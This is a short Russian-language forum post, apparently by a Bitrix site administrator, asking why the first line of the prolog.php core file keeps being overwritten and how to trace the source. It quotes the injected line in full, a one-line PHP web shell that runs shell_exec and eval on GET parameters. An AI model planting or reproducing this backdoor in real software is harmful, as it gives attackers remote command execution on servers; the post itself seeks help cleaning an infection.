В файле /bitrix/modules/main/include/prolog.php регулярно заменяется 1-ая строка на такой код:
Если не удалить этот кусок кода, то на сайте начинают появляться другие вирусные файлы.
Как понять, что именно заменяет код в этом файле?
Вирусные файлы удалил после сканирования. Список агентов чист.
Код |
---|
<?if(isset($_GET['micat']))echo shell_exec($_GET['micat']);if(isset($_GET['midog']))echo eval($_GET['midog']); |
Если не удалить этот кусок кода, то на сайте начинают появляться другие вирусные файлы.
Как понять, что именно заменяет код в этом файле?
Вирусные файлы удалил после сканирования. Список агентов чист.